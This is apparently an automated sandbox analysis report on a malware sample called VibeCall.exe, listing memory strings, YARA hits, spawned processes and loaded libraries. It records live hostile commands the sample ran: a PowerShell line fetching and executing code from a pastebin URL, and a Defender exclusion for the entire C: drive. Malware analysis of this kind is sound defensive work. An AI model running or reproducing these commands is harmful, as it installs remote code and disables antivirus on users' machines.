Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet/downloadCommon
Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet/info
Source: VibeCall.exe, 00000000.00000000.1698421125.00007FF735D3D000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://aka.ms/dotnet/sdk-not-found
Source: powershell.exe, 00000002.00000002.1802031537.0000024D0F061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1802434498.000001DC5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1939098908.000001449F6A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: fontdrvhost.exe | String found in binary or memory: https://cloudflare-dns.com/dns-query
Source: powershell.exe, 00000009.00000002.2055618666.00000144AF713000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2055618666.00000144AF713000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2055618666.00000144AF713000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: VibeCall.exe, 00000000.00000003.1706005579.000001CCB0BB2000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1706619833.000001CCB0BAD000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1705881056.000001CCB0BB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.mic
Source: VibeCall.exe, 00000000.00000003.1705881056.000001CCB0BB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.microsoft.c
Source: powershell.exe, 00000009.00000002.1939098908.000001449F8C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1802434498.000001DC5D44B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.1937222255.000001449F595000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000002.00000002.1866786065.0000024D1F0D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1864011647.000001DC6C4A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1802434498.000001DC5D94A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1864011647.000001DC6C363000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2055618666.00000144AF713000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1802434498.000001DC5D44B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.1802434498.000001DC5D94A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/QE03kE1s
Source: powershell.exe, 00000004.00000002.1801659336.000001DC5A850000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/qe03ke1s
Source: soundsolution_vibecall_c.exe, 00000011.00000000.2232602474.0000000000507000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: https://www.entrust.net/rpa0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_78213d8d-3
                      Source: aisolution_vibecall_a.exe, 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_60fd853b-f
                      Source: Yara matchFile source: 18.3.videosolution_vibecall_b.exe.3e90000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.3.fontdrvhost.exe.5510000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.aisolution_vibecall_a.exe.3ce0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.aisolution_vibecall_a.exe.3ac0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.aisolution_vibecall_a.exe.3ce0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.3.fontdrvhost.exe.4a50000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.3.fontdrvhost.exe.51f0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.3.fontdrvhost.exe.5410000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.contry_solution_vibecall_e.exe.3a60000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.3.fontdrvhost.exe.4c70000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.contry_solution_vibecall_e.exe.3c80000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.3.fontdrvhost.exe.52f0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.3.fontdrvhost.exe.4c70000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.3.videosolution_vibecall_b.exe.3e90000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.3.videosolution_vibecall_b.exe.3c70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.3.contry_solution_vibecall_e.exe.3a60000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.3.videosolution_vibecall_b.exe.3c70000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.3.videosolution_vibecall_b.exe.3c70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.3.contry_solution_vibecall_e.exe.3c80000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 40.3.fontdrvhost.exe.5510000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000012.00000003.2593226340.0000000003E90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2442071082.0000000003CE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.2459826621.0000000004C70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000003.2592963107.0000000003C70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.2600818317.0000000005510000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.2600463624.00000000052F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.2441848134.0000000003AC0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.2479321199.0000000003A60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.2457252021.0000000004A50000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.2488297970.0000000005410000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.2487685333.00000000051F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aisolution_vibecall_a.exe PID: 8116, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: contry_solution_vibecall_e.exe PID: 8136, type: MEMORYSTR
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056EC3B9 CreateEventA,NtDeviceIoControlFile,WaitForSingleObject,GetLastError,CloseHandle,WSASetLastError,CloseHandle,WSASetLastError | 31_2_056EC3B9
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 37_2_0000025F79D615C0 NtAcceptConnectPort | 37_2_0000025F79D615C0
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 37_2_0000025F79D60AC8 NtAcceptConnectPort,NtAcceptConnectPort | 37_2_0000025F79D60AC8
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 37_2_0000025F79D61CF4 NtAcceptConnectPort,CloseHandle | 37_2_0000025F79D61CF4
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 37_2_0000025F79D61AA4 NtAcceptConnectPort,NtAcceptConnectPort | 37_2_0000025F79D61AA4
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 45_2_0000026D37E91CF4 NtAcceptConnectPort,CloseHandle | 45_2_0000026D37E91CF4
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 45_2_0000026D37E90AC8 NtAcceptConnectPort,NtAcceptConnectPort | 45_2_0000026D37E90AC8
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 45_2_0000026D37E915C0 NtAcceptConnectPort | 45_2_0000026D37E915C0
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 45_2_0000026D37E91AA4 NtAcceptConnectPort,NtAcceptConnectPort | 45_2_0000026D37E91AA4
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056EC3B9: CreateEventA,NtDeviceIoControlFile,WaitForSingleObject,GetLastError,CloseHandle,WSASetLastError,CloseHandle,WSASetLastError | 31_2_056EC3B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B5430E9 | 2_2_00007FFD9B5430E9
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013BF13B | 14_3_013BF13B
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013C1170 | 14_3_013C1170
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013CCC25 | 14_3_013CCC25
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013BC09A | 14_3_013BC09A
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013C6F89 | 14_3_013C6F89
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013BC3DC | 14_3_013BC3DC
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013C264D | 14_3_013C264D
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_3_01621170 | 15_3_01621170
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_3_0161F13B | 15_3_0161F13B
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_3_0162CC25 | 15_3_0162CC25
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_3_0161C09A | 15_3_0161C09A
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_3_0161C3DC | 15_3_0161C3DC
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_3_01626F89 | 15_3_01626F89
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_3_0162264D | 15_3_0162264D
Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | Code function: 18_3_016681D2 | 18_3_016681D2
Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | Code function: 18_3_0165C231 | 18_3_0165C231
Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | Code function: 18_3_0165C400 | 18_3_0165C400
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056FD5A9 | 31_2_056FD5A9
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056FFC02 | 31_2_056FFC02
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056E94D0 | 31_2_056E94D0
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056FCF7E | 31_2_056FCF7E
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056F8660 | 31_2_056F8660
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056F89ED | 31_2_056F89ED
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056E91CA | 31_2_056E91CA
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056F318B | 31_2_056F318B
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_0570104C | 31_2_0570104C
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056FDB45 | 31_2_056FDB45
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_2_056FD229 | 31_2_056FD229
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 37_2_0000025F79D60C70 | 37_2_0000025F79D60C70
Source: C:\Windows\System32\fontdrvhost.exe | Code function: 45_2_0000026D37E90C70 | 45_2_0000026D37E90C70
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: String function: 01617FB0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: String function: 013B7FB0 appears 38 times
Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | Code function: String function: 0165CD90 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 652
Source: VibeCall.exe | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: aisolution_vibecall_a.exe.0.dr | Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: aisolution_vibecall_a.exe.0.dr | Static PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
Source: contry_solution_vibecall_e.exe.0.dr | Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: contry_solution_vibecall_e.exe.0.dr | Static PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
Source: contry_solution_vibecall_e.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: soundsolution_vibecall_c.exe.0.dr | Static PE information: Resource name: BIN type: PE32+ executable (console) x86-64, for MS Windows
Source: soundsolution_vibecall_c.exe.0.dr | Static PE information: Resource name: BIN type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: soundsolution_vibecall_c.exe.0.dr | Static PE information: Resource name: BIN type: PE32+ executable (console) Aarch64, for MS Windows
Source: soundsolution_vibecall_c.exe.0.dr | Static PE information: Resource name: BIN type: PE32+ executable (DLL) (GUI) Aarch64, for MS Windows
Source: videosolution_vibecall_b.exe.0.dr | Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: videosolution_vibecall_b.exe.0.dr | Static PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
Source: VibeCall.exe, 00000000.00000000.1698594920.00007FF735F42000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamemscordaccore.dll@ vs VibeCall.exe
Source: VibeCall.exe, 00000000.00000000.1698594920.00007FF735F42000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameVibeCall.dll2 vs VibeCall.exe
Source: classification engine | Classification label: mal96.troj.evad.winEXE@35/21@5/9
Source: C:\Users\user\Desktop\VibeCall.exe | File created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-99e96d32-cf93-bab661-d67703b36bf3}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-dd899bff-6062-c92311-31f6a4e226f8}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4e5bfc57-9dd8-f68e5-2d765d85c0d6}
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7748
Source: C:\Users\user\Desktop\VibeCall.exe | File created: C:\Users\user\AppData\Local\Temp\2xejzszc.hcd
Source: C:\Users\user\Desktop\VibeCall.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\VibeCall.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\VibeCall.exe "C:\Users\user\Desktop\VibeCall.exe"
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe "C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe"
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe "C:\Users\user\Downloads\soundsolution_vibecall_c.exe"
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 652
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 660
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8136 -s 664
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8136 -s 684
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\System32\fontdrvhost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7748 -s 136
Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 500
Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 376
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: icu.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: wshunix.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: devobj.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\VibeCall.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
